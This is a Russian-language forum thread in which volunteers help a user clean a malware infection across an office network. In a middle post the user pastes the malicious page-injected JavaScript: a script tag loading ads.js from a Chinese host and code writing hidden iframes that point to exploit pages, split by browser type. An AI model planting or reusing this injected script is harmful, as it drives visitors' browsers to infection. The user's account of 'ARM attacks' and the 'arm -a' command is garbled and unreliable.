Руины после атаки

[PavelA]

Для восст Safe Mode AVZ - Файл - Восст системы - п.10

Временные файлы Инета почисти.
Найти через AVZ: C:\WINDOWS\AppPatch\Jview.dll, поместить в карантин и затем удалить.

Логи посмотрим, м.б. что-нибудь еще увидим.

[Petro8i4]

Через avz не ищется ... с логами не понял, ещё раз выложить или вы старые ещё посмотрите?

[PavelA]

Да, новые, после всех последних удалений.

[Petro8i4]

сделал, появилась новая ошибка, вываливается окно, скрин в приложении.

[PavelA]

Вот эти два файла знаешь что это такое:
C:\Documents and Settings\MANAGER\Application Data\m\flec006.exe
C:\Program Files\KsCatalog\webtogo\wtgstart.bat

Если нет, то загрузить их в карантин и прислать нам на анализ.

По поводу ошибки: можно через AVZ сделать поиск в реестре по имени файла, что выдается на окошке и удалить ключики реестра, где он встретиться.

[Petro8i4]

первый файл не известен, второй знаю ... сейчас попробую его выслать ...
и с ошибкой, спасибо за совет, сейчас попробую!!!!

[Petro8i4]

C:\Documents and Settings\MANAGER\Application Data\m\flec006.exe - файл найти не удалось

и тот файл, что в скрине, который я вам прислал тоже обнаружить не получается, есть только похожее C:\WINDOWS\Prefetch\ORZ.EXE-3238823D.pf, удалял его - всё равно появляется - эта фигня уже достала, ничего скачать нельзя, как только с нета что-нибдуь хочешь вытащить - лезет!!! в реестре ссылок нет, удалить её можно, но следующий клик по любой ссыле её оживляет!

из вирусов постоянно беспокоит root.51113.com/root.gif - Win32/TrojanDownloader.Murlo.NN trojan, как с ним бороться?

Добавлено через 2 часа 0 минут

Господа, помогите избавится от непонятного вируса, ничто его не детектит! при попытке что-нибудь скачать с нета вылетает ошибка, скриншот в посте повыше. При чём эта тварь как-будто бы быстро распространяется по сети!

Добавлено через 2 часа 0 минут

Кто-нибудь поможет, господа?

Добавлено через 46 минут

Нашёл,что вирус свежачёк
http://www.prevx.com/filenames/X4687...5/ORZ.EXE.html
только никак не получается скачать програмулину, которая вроде бы как избавит от это ГАДА!!! если у кого нибудь есть в наличии сей продукт, сбросте на [email protected] !?

Добавлено через 2 часа 16 минут

меня наверное скоро забанят?
не помогает данная прога, какая то она странная,больше похоже на то, что она ещё вирей напустит. каким образом можно вычислить как появляется файл orz.exe? я уж и хайджеком всё подчистил всё из автозагрузки снёс, а он уже и у соседей сидит этот вирь! ещё интересно то, что он вылетает только при работе с IE, если,например, запустить Firefox или Opera то работать можно, но только ничего не скачивается, когда хочешь что-нибудь скачать скорости нет совсем. прову звонил, да и сам мониторил, спам не идёт, канал нормальный, а ничего скачать нельзя!

Добавлено через 1 минуту

ЗЫ: не теряю надежды

Добавлено через 15 минут

вот собсно и сам зловред,его даже в блокноте посмотреть можно ...

[Kuzz]

Недавно этого root.gif гонял.
Попробуйте отключившись от интернета почистить все временные файлы и кеш браузера у всех пользователей. Даже для пользователей NetworkService, LocalService и System.
И после всего этого, не подключаясь к и-нету еще раз прогнать 3-й скрипт.

[kps]

Пункт 2 правил выполнялся? Альман - файловый вирус. Или можете сделать полную проверку в AVPTool.

[Petro8i4]

Пункт 2 выполнялся, с этой штукой "orz.exe" - ничего не помоглою Спасибо за совет по поводу root.gif, сейчас попробую снести! С альманом конечно трудно бороться, но его вроде бы победил, а вот что за таинственный зловред, который не даёт нормально работать с интернетом??? его даже идентифицировать трудно!

Добавлено через 2 часа 26 минут

и всё таки кто-нибудь встречался с этим гадом "orz.exe" ... есть подозрение, что это производная он вируса Trojan-Downloader.JS.Multi.cj, который каким то образом всё время проявляется файлом c:\Documents and Settings\Администратор\Local Settings\Temporary Internet Files\Content.IE5\0HAB4LQB\ads[1].js -определяется только семейством касперов!

Добавлено через 32 минуты

Вот грёбаный скрипт, который содержит файл orz.exe: собсно вот он и добавляет его в страничку, реагирует только експлоер, хотя работает скрипт во всех браузерах! как же его изничтожить??? похоже свежый уродец, ещё нет решения???


<script language="javascript" SRC="http://hk.www404.cn:53/ads.js"></script> <html><script>window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie ")>0)
{
document.write("<iframe src=http://flash.w3cpublic.cn:8080/f/ilink.html width=100 height=0></iframe>");
}
else{document.write("<iframe src=http://flash.w3cpublic.cn:8080/f/flink.html width=100 height=0></iframe>");}
}
</script></html>

Добавлено через 25 минут

единственные два компа,которые не пострадали были БЕЗ АНТИВИРУСА)))))))))))))

[Kuzz]

всё таки кто-нибудь встречался с этим гадом "orz.exe" ... есть подозрение, что это производная он вируса Trojan-Downloader.JS.Multi.cj, который каким то образом всё время проявляется файлом c:\Documents and Settings\Администратор\Local Settings\Temporary Internet Files\Content.IE5\0HAB4LQB\ads[1].js -определяется только семейством касперов

А не в этом ли причина

Код:

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.daemon-search.com/default
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://dt-updates.com/activate?query=Xd4suOWfXEeqjdgZwfln5qaIBSihY7w%2fXRU6y8q0wThPLDjEaLP10wZA089n5wFomZhw4D7VOJx8%2b2KiDghHDotIpl5aEU8TCj9NL8UxTfjAxSm6VmB40aDuAtAOH3VnRVEly6t%2fyaycAIh%2bLqATLJ1YDgifSumDnqtWbwQvOIO7LDadj5P934fBiLuin5Xvw3cWYD2soOumxA3beDoerLHAyWsb8EdpAiaD6LYaJq87Iut1pZygBYht%2bDmL4KMJ8o%2bpglZ1gRRZAoEcx7skyEWZtqU%2bhCzPLmJo97hgF90%3d

Если эти адреса не Вами прописаны, пофиксите указаные строчки

Очень желательно поставить 3-й сервиспак.

[Petro8i4]

ну первая известна, просто daemon tools ставил, она и прописалась, а вот вторая нет, попробую снести, а sp3 уже накатил, думал обновлю винду и всё пройдёт, даже ИЕ 8 поставил, проверил авп и крюит в безопасном режиме, снёс все темпы под корень, а вместе с ними и корзину и систем вольюм ... ничего не помогает(((

[Petro8i4]

Господа, получилась очень интересная тема!
ответ нашёлся на одном буржуйском сайте, ссылку не дам, не сохранилась ... по гуглу нашёл!
Вобщим Multi.cj (создаёт в темпе файл orz.exe и прописывает на страничках такой код: <script language="javascript" SRC="http://hk.www404.cn:53/ads.js"></script>, каспер кстати пытается при любом обращении не пропускать его, но тщетно, только удаляет файл c:\Documents and Settings\Администратор\Local Settings\Temporary Internet Files\Content.IE5\0HAB4LQB\ads[1].js) используется для poofing (пуфинга) или ARM атак, как я понимаю это то, что называют "хорошо забытое старое"! Вобщем алгоритм выявления в сети ARM-вирусов,в частности именно этого, cmd, потом arm -a, и смотрим какой MAC адрес компа в сети совпадает с MACом шлюза, если такой есть - значит сеть заражена, отрубаем комп (компы) от сети и нафиг сносим всё что на них есть, хотя можно попробовать и полечить, но я после первой попытки отказался, просто на компе и так почти ничего не было! Есть второй способ определения: берём програмку ARProtect, устанавливаем, и она считает ARM атаки и показывает, что за гад это делает. Господа, вобщем надеюсь никому не придётся с этим столкнуться! У меня вся сеть трещала, при чём каждый антивирь находит свой вирус!! И ошибки чуть ли не на каждом компе разные!
Удачи в победах над вирусами!

[PavelA]

Молодец, что не сдался. Твоя И-ция важна для лечения других, за нее отдельное СПС.

[Petro8i4]

Я просто не мог сдаться Выхода не было!

[CyberHelper]

Статистика проведенного лечения:

• Получено карантинов: 3
• Обработано файлов: 6
• В ходе лечения обнаружены вредоносные программы:
  
  1. c:\\windows\\system32\\wintems.exe - Email-Worm.Win32.Bagle.of (DrWEB: Win32.HLLM.Beagle)
  2. \\orz.exe - Trojan-Downloader.JS.Iframe.si